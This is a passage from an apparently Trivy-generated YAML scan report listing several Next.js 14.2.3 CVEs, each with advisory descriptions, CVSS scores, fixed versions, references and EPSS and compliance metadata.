description: Next.js is a React framework for building full-stack web applications.
|
|
In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization
|
|
is vulnerable to content injection. The issue allowed attacker-controlled external
|
|
image sources to trigger file downloads with arbitrary content and filenames under
|
|
specific configurations. This behavior could be abused for phishing or malicious
|
|
file delivery. This vulnerability has been fixed in Next.js versions 14.2.31 and
|
|
15.4.5.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2025-55173
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id031
|
|
- CWE-20
|
|
raw:
|
|
VulnerabilityID: CVE-2025-55173
|
|
VendorIDs:
|
|
- GHSA-xv57-4mr9-wg8v
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 14.2.31, 15.4.5
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-55173
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:4f427324d504eade5234a30344e36974820c0e709bf9b4e93f269dc3d12b445e
|
|
Title: 'nextjs: Next.js Content Injection Vulnerability for Image Optimization'
|
|
Description: Next.js is a React framework for building full-stack web applications.
|
|
In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization
|
|
is vulnerable to content injection. The issue allowed attacker-controlled external
|
|
image sources to trigger file downloads with arbitrary content and filenames
|
|
under specific configurations. This behavior could be abused for phishing or
|
|
malicious file delivery. This vulnerability has been fixed in Next.js versions
|
|
14.2.31 and 15.4.5.
|
|
Severity: MEDIUM
|
|
CweIDs: *id031
|
|
VendorSeverity:
|
|
ghsa: 2
|
|
redhat: 2
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
|
|
V3Score: 4.3
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
|
|
V3Score: 4.3
|
|
References:
|
|
- http://vercel.com/changelog/cve-2025-55173
|
|
- https://access.redhat.com/security/cve/CVE-2025-55173
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-xv57-4mr9-wg8v
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2025-55173
|
|
- https://vercel.com/changelog/cve-2025-55173
|
|
- https://www.cve.org/CVERecord?id=CVE-2025-55173
|
|
PublishedDate: '2025-08-29T22:15:31.75Z'
|
|
LastModifiedDate: '2025-09-08T16:42:57.183Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A03:2021
|
|
cweTop25_2024:
|
|
- id: CWE-20
|
|
rank: 4
|
|
category: Input Validation
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 13.610133333333334
|
|
epss: 0.00519
|
|
epss_percentile: 0.67013
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0207600000000001
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 90791fc1fd7573b4
|
|
ruleId: CVE-2025-57752
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'nextjs: Next.js Affected by Cache Key Confusion for Image Optimization
|
|
API Routes'
|
|
title: CVE-2025-57752
|
|
description: Next.js is a React framework for building full-stack web applications.
|
|
In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization
|
|
API routes are affected by cache key confusion. When images returned from API
|
|
routes vary based on request headers (such as Cookie or Authorization), these
|
|
responses could be incorrectly cached and served to unauthorized users due to
|
|
a cache key confusion bug. This vulnerability has been fixed in Next.js versions
|
|
14.2.31 and 15.4.5. All users are encouraged to upgrade if they use API routes
|
|
to serve images that depend on request headers and have image optimization enabled.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2025-57752
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id032
|
|
- CWE-524
|
|
raw:
|
|
VulnerabilityID: CVE-2025-57752
|
|
VendorIDs:
|
|
- GHSA-g5qg-72qw-gw5v
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 14.2.31, 15.4.5
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-57752
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:e3be615ed1140070180ac876273edccfb1b377de96b6e4f65e1ad6ef700e860a
|
|
Title: 'nextjs: Next.js Affected by Cache Key Confusion for Image Optimization
|
|
API Routes'
|
|
Description: Next.js is a React framework for building full-stack web applications.
|
|
In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization
|
|
API routes are affected by cache key confusion. When images returned from API
|
|
routes vary based on request headers (such as Cookie or Authorization), these
|
|
responses could be incorrectly cached and served to unauthorized users due to
|
|
a cache key confusion bug. This vulnerability has been fixed in Next.js versions
|
|
14.2.31 and 15.4.5. All users are encouraged to upgrade if they use API routes
|
|
to serve images that depend on request headers and have image optimization enabled.
|
|
Severity: MEDIUM
|
|
CweIDs: *id032
|
|
VendorSeverity:
|
|
ghsa: 2
|
|
redhat: 2
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
V3Score: 6.2
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
V3Score: 6.2
|
|
References:
|
|
- https://access.redhat.com/security/cve/CVE-2025-57752
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd
|
|
- https://github.com/vercel/next.js/pull/82114
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-g5qg-72qw-gw5v
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2025-57752
|
|
- https://vercel.com/changelog/cve-2025-57752
|
|
- https://www.cve.org/CVERecord?id=CVE-2025-57752
|
|
PublishedDate: '2025-08-29T22:15:31.963Z'
|
|
LastModifiedDate: '2025-09-08T16:43:50.33Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 13.391466666666664
|
|
epss: 0.00109
|
|
epss_percentile: 0.28624
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.00436
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 027359ccd596dbb5
|
|
ruleId: CVE-2025-57822
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: Next.js Improper Middleware Redirect Handling Leads to SSRF
|
|
title: CVE-2025-57822
|
|
description: Next.js is a React framework for building full-stack web applications.
|
|
Prior to versions 14.2.32 and 15.4.7, when next() was used without explicitly
|
|
passing the request object, it could lead to SSRF in self-hosted applications
|
|
that incorrectly forwarded user-supplied headers. This vulnerability has been
|
|
fixed in Next.js versions 14.2.32 and 15.4.7. All users implementing custom middleware
|
|
logic in self-hosted environments are strongly encouraged to upgrade and verify
|
|
correct usage of the next() function.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2025-57822
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id033
|
|
- CWE-918
|
|
raw:
|
|
VulnerabilityID: CVE-2025-57822
|
|
VendorIDs:
|
|
- GHSA-4342-x723-ch2f
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 14.2.32, 15.4.7
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-57822
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:d25b005e7cf8bac08753ec41dc06257909625a91eeaa10bcc06f3ea028d530e1
|
|
Title: Next.js Improper Middleware Redirect Handling Leads to SSRF
|
|
Description: Next.js is a React framework for building full-stack web applications.
|
|
Prior to versions 14.2.32 and 15.4.7, when next() was used without explicitly
|
|
passing the request object, it could lead to SSRF in self-hosted applications
|
|
that incorrectly forwarded user-supplied headers. This vulnerability has been
|
|
fixed in Next.js versions 14.2.32 and 15.4.7. All users implementing custom
|
|
middleware logic in self-hosted environments are strongly encouraged to upgrade
|
|
and verify correct usage of the next() function.
|
|
Severity: MEDIUM
|
|
CweIDs: *id033
|
|
VendorSeverity:
|
|
ghsa: 2
|
|
nvd: 3
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N
|
|
V3Score: 6.5
|
|
nvd:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
|
|
V3Score: 8.2
|
|
References:
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/commit/9c9aaed5bb9338ef31b0517ccf0ab4414f2093d8
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2025-57822
|
|
- https://vercel.com/changelog/cve-2025-57822
|
|
PublishedDate: '2025-08-29T22:15:32.143Z'
|
|
LastModifiedDate: '2025-09-08T16:41:41.253Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A10:2021
|
|
cweTop25_2024:
|
|
- id: CWE-918
|
|
rank: 19
|
|
category: SSRF
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 17.501333333333335
|
|
epss: 0.07815
|
|
epss_percentile: 0.92065
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.3126
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 580a09237cbe3791
|
|
ruleId: CVE-2025-59471
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'next: NextJS Denial of Service in Image Optimizer'
|
|
title: CVE-2025-59471
|
|
description: "A denial of service vulnerability exists in self-hosted Next.js applications\
|
|
\ that have `remotePatterns` configured for the Image Optimizer. The image optimization\
|
|
\ endpoint (`/_next/image`) loads external images entirely into memory without\
|
|
\ enforcing a maximum size limit, allowing an attacker to cause out-of-memory\
|
|
\ conditions by requesting optimization of arbitrarily large images. This vulnerability\
|
|
\ requires that `remotePatterns` is configured to allow image optimization from\
|
|
\ external domains and that the attacker can serve or control a large image on\
|
|
\ an allowed domain.\r\n\r\nStrongly consider upgrading to 15.5.10 or 16.1.5 to\
|
|
\ reduce risk and prevent availability issues in Next applications."
|
|
remediation: https://avd.aquasec.com/nvd/cve-2025-59471
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id034
|
|
- CWE-400
|
|
raw:
|
|
VulnerabilityID: CVE-2025-59471
|
|
VendorIDs:
|
|
- GHSA-9g9p-9gw9-jx7f
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 15.5.10, 16.1.5
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-59471
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:5c1c3f76d7551a0dbaa560bc61f2517af1be6d9676bb5cccc73c04f0dd664b11
|
|
Title: 'next: NextJS Denial of Service in Image Optimizer'
|
|
Description: "A denial of service vulnerability exists in self-hosted Next.js\
|
|
\ applications that have `remotePatterns` configured for the Image Optimizer.\
|
|
\ The image optimization endpoint (`/_next/image`) loads external images entirely\
|
|
\ into memory without enforcing a maximum size limit, allowing an attacker to\
|
|
\ cause out-of-memory conditions by requesting optimization of arbitrarily large\
|
|
\ images. This vulnerability requires that `remotePatterns` is configured to\
|
|
\ allow image optimization from external domains and that the attacker can serve\
|
|
\ or control a large image on an allowed domain.\r\n\r\nStrongly consider upgrading\
|
|
\ to 15.5.10 or 16.1.5 to reduce risk and prevent availability issues in Next\
|
|
\ applications."
|
|
Severity: MEDIUM
|
|
CweIDs: *id034
|
|
VendorSeverity:
|
|
ghsa: 2
|
|
nvd: 3
|
|
redhat: 2
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 5.9
|
|
nvd:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 5.9
|
|
References:
|
|
- https://access.redhat.com/security/cve/CVE-2025-59471
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/commit/500ec83743639addceaede95e95913398975156c
|
|
- https://github.com/vercel/next.js/commit/e5b834d208fe0edf64aa26b5d76dcf6a176500ec
|
|
- https://github.com/vercel/next.js/releases/tag/v15.5.10
|
|
- https://github.com/vercel/next.js/releases/tag/v16.1.5
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-9g9p-9gw9-jx7f
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2025-59471
|
|
- https://www.cve.org/CVERecord?id=CVE-2025-59471
|
|
PublishedDate: '2026-01-26T22:15:52.89Z'
|
|
LastModifiedDate: '2026-02-13T15:03:20.29Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 13.347733333333334
|
|
epss: 0.00027
|
|
epss_percentile: 0.07874
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.00108
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 04e5c6fdba912e88
|
|
ruleId: CVE-2026-27980
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'next.js: Next.js: Unbounded next/image disk cache growth can exhaust storage'
|
|
title: CVE-2026-27980
|
|
description: 'Next.js is a React framework for building full-stack web applications.
|
|
Starting in version 10.0.0 and prior to version 16.1.7, the default Next.js image
|
|
optimization disk cache (`/_next/image`) did not have a configurable upper bound,
|
|
allowing unbounded cache growth. An attacker could generate many unique image-optimization
|
|
variants and exhaust disk space, causing denial of service. This is fixed in version
|
|
16.1.7 by adding an LRU-backed disk cache with `images.maximumDiskCacheSize`,
|
|
including eviction of least-recently-used entries when the limit is exceeded.
|
|
Setting `maximumDiskCacheSize: 0` disables disk caching. If upgrading is not immediately
|
|
possible, periodically clean `.next/cache/images` and/or reduce variant cardinality
|
|
(e.g., tighten values for `images.localPatterns`, `images.remotePatterns`, and
|
|
`images.qualities`).'
|
|
remediation: https://avd.aquasec.com/nvd/cve-2026-27980
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id035
|
|
- CWE-400
|
|
raw:
|
|
VulnerabilityID: CVE-2026-27980
|
|
VendorIDs:
|
|
- GHSA-3x4c-7xq6-9pq8
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 16.1.7, 15.5.14
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-27980
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:5dec13177768ddafe594e0b28117c9687a4df1799c6cf21c3db279c85cdce71f
|
|
Title: 'next.js: Next.js: Unbounded next/image disk cache growth can exhaust storage'
|
|
Description: 'Next.js is a React framework for building full-stack web applications.
|
|
Starting in version 10.0.0 and prior to version 16.1.7, the default Next.js
|
|
image optimization disk cache (`/_next/image`) did not have a configurable upper
|
|
bound, allowing unbounded cache growth. An attacker could generate many unique
|
|
image-optimization variants and exhaust disk space, causing denial of service.
|
|
This is fixed in version 16.1.7 by adding an LRU-backed disk cache with `images.maximumDiskCacheSize`,
|
|
including eviction of least-recently-used entries when the limit is exceeded.
|
|
Setting `maximumDiskCacheSize: 0` disables disk caching. If upgrading is not
|
|
immediately possible, periodically clean `.next/cache/images` and/or reduce
|
|
variant cardinality (e.g., tighten values for `images.localPatterns`, `images.remotePatterns`,
|
|
and `images.qualities`).'
|
|
Severity: MEDIUM
|
|
CweIDs: *id035
|
|
VendorSeverity:
|
|
ghsa: 2
|
|
nvd: 3
|
|
redhat: 2
|
|
CVSS:
|
|
ghsa:
|
|
V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
|
|
V40Score: 6.9
|
|
nvd:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
|
|
V3Score: 5.3
|
|
References:
|
|
- https://access.redhat.com/security/cve/CVE-2026-27980
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/commit/39eb8e0ac498b48855a0430fbf4c22276a73b4bd
|
|
- https://github.com/vercel/next.js/releases/tag/v16.1.7
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-3x4c-7xq6-9pq8
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2026-27980
|
|
- https://www.cve.org/CVERecord?id=CVE-2026-27980
|
|
PublishedDate: '2026-03-18T01:16:04.957Z'
|
|
LastModifiedDate: '2026-03-18T19:52:54.307Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 13.345066666666668
|
|
epss: 0.00022
|
|
epss_percentile: 0.06354
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.00088
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 868dbd425c7fc3b4
|
|
ruleId: CVE-2026-29057
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'next.js: Next.js: HTTP request smuggling in rewrites'
|
|
title: CVE-2026-29057
|
|
description: "Next.js is a React framework for building full-stack web applications.\
|
|
\ Starting in version 9.5.0 and prior to versions 15.5.13 and 16.1.7, when Next.js\
|
|
\ rewrites proxy traffic to an external backend, a crafted `DELETE`/`OPTIONS`\
|
|
\ request using `Transfer-Encoding: chunked` could trigger request boundary disagreement\
|
|
\ between the proxy and backend. This could allow request smuggling through rewritten\
|
|
\ routes. An attacker could smuggle a second request to unintended backend routes\
|
|
\ (for example, internal/admin endpoints), bypassing assumptions that only the\
|
|
\ configured rewrite destination/path is reachable. This does not impact applications\
|
|
\ hosted on providers that handle rewrites at the CDN level, such as Vercel. \
|
|
\ The vulnerability originated in an upstream library vendored by Next.js. It\
|
|
\ is fixed in Next.js 15.5.13 and 16.1.7 by updating that dependency\u2019s behavior\
|
|
\ so `content-length: 0` is added only when both `content-length` and `transfer-encoding`\
|
|
\ are absent, and `transfer-encoding` is no longer removed in that code path.\
|
|
\ If upgrading is not immediately possible, block chunked `DELETE`/`OPTIONS` requests\
|
|
\ on rewritten routes at the edge/proxy, and/or enforce authentication/authorization\
|
|
\ on backend routes."
|
|
remediation: https://avd.aquasec.com/nvd/cve-2026-29057
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id036
|
|
- CWE-444
|
|
raw:
|
|
VulnerabilityID: CVE-2026-29057
|
|
VendorIDs:
|
|
- GHSA-ggv3-7p47-pfv8
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 16.1.7, 15.5.13
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-29057
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:4074e32bdcb36d75198ac9560fe4244edba80bb6731805115c47dcfbb97b302f
|
|
Title: 'next.js: Next.js: HTTP request smuggling in rewrites'
|
|
Description: "Next.js is a React framework for building full-stack web applications.\
|
|
\ Starting in version 9.5.0 and prior to versions 15.5.13 and 16.1.7, when Next.js\
|
|
\ rewrites proxy traffic to an external backend, a crafted `DELETE`/`OPTIONS`\
|
|
\ request using `Transfer-Encoding: chunked` could trigger request boundary\
|
|
\ disagreement between the proxy and backend. This could allow request smuggling\
|
|
\ through rewritten routes. An attacker could smuggle a second request to unintended\
|
|
\ backend routes (for example, internal/admin endpoints), bypassing assumptions\
|
|
\ that only the configured rewrite destination/path is reachable. This does\
|
|
\ not impact applications hosted on providers that handle rewrites at the CDN\
|
|
\ level, such as Vercel. The vulnerability originated in an upstream library\
|
|
\ vendored by Next.js. It is fixed in Next.js 15.5.13 and 16.1.7 by updating\
|
|
\ that dependency\u2019s behavior so `content-length: 0` is added only when\
|
|
\ both `content-length` and `transfer-encoding` are absent, and `transfer-encoding`\
|
|
\ is no longer removed in that code path. If upgrading is not immediately possible,\
|
|
\ block chunked `DELETE`/`OPTIONS` requests on rewritten routes at the edge/proxy,\
|
|
\ and/or enforce authentication/authorization on backend routes."
|
|
Severity: MEDIUM
|
|
CweIDs: *id036
|
|
VendorSeverity:
|
|
ghsa: 2
|
|
nvd: 2
|
|
redhat: 2
|
|
CVSS:
|
|
ghsa:
|
|
V40Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
|
|
V40Score: 6.3
|
|
nvd:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
|
|
V3Score: 6.5
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
|
|
V3Score: 6.5
|
|
References:
|
|
- https://access.redhat.com/security/cve/CVE-2026-29057
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/commit/dc98c04f376c6a1df76ec3e0a2d07edf4abdabd6
|
|
- https://github.com/vercel/next.js/releases/tag/v15.5.13
|
|
- https://github.com/vercel/next.js/releases/tag/v16.1.7
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-ggv3-7p47-pfv8
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2026-29057
|
|
- https://www.cve.org/CVERecord?id=CVE-2026-29057
|
|
PublishedDate: '2026-03-18T01:16:05.443Z'
|
|
LastModifiedDate: '2026-03-18T19:49:19.633Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 13.349866666666665
|
|
epss: 0.00031
|
|
epss_percentile: 0.0913
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.00124
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: e4364d984e862d8f
|
|
ruleId: CVE-2026-44576
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: Next.js vulnerable to cache poisoning in React Server Component responses
|
|
title: CVE-2026-44576
|
|
description: Next.js is a React framework for building full-stack web applications.
|
|
From 14.2.0 to before 15.5.16 and 16.2.5, applications using React Server Components
|
|
can be vulnerable to cache poisoning when shared caches do not correctly partition
|
|
response variants. Under affected conditions, an attacker can cause an RSC response
|
|
to be served from the original URL and poison shared cache entries so later visitors
|
|
receive component payloads instead of the expected HTML. This vulnerability is
|
|
fixed in 15.5.16 and 16.2.5.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2026-44576
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id037
|
|
- CWE-436
|
|
raw:
|
|
VulnerabilityID: CVE-2026-44576
|
|
VendorIDs:
|
|
- GHSA-wfc6-r584-vfw7
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 15.5.16, 16.2.5
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44576
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:3c9e2e46b20aad817d3abe8e7abd455ede89a3c4d8a51dc478704b39dba080bb
|
|
Title: Next.js vulnerable to cache poisoning in React Server Component responses
|
|
Description: Next.js is a React framework for building full-stack web applications.
|
|
From 14.2.0 to before 15.5.16 and 16.2.5, applications using React Server Components
|
|
can be vulnerable to cache poisoning when shared caches do not correctly partition
|
|
response variants. Under affected conditions, an attacker can cause an RSC response
|
|
to be served from the original URL and poison shared cache entries so later
|
|
visitors receive component payloads instead of the expected HTML. This vulnerability
|
|
is fixed in 15.5.16 and 16.2.5.
|
|
Severity: MEDIUM
|
|
CweIDs: *id037
|
|
VendorSeverity:
|
|
ghsa: 2
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:L
|
|
V3Score: 5.4
|
|
References:
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/releases/tag/v15.5.16
|
|
- https://github.com/vercel/next.js/releases/tag/v16.2.5
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7
|
|
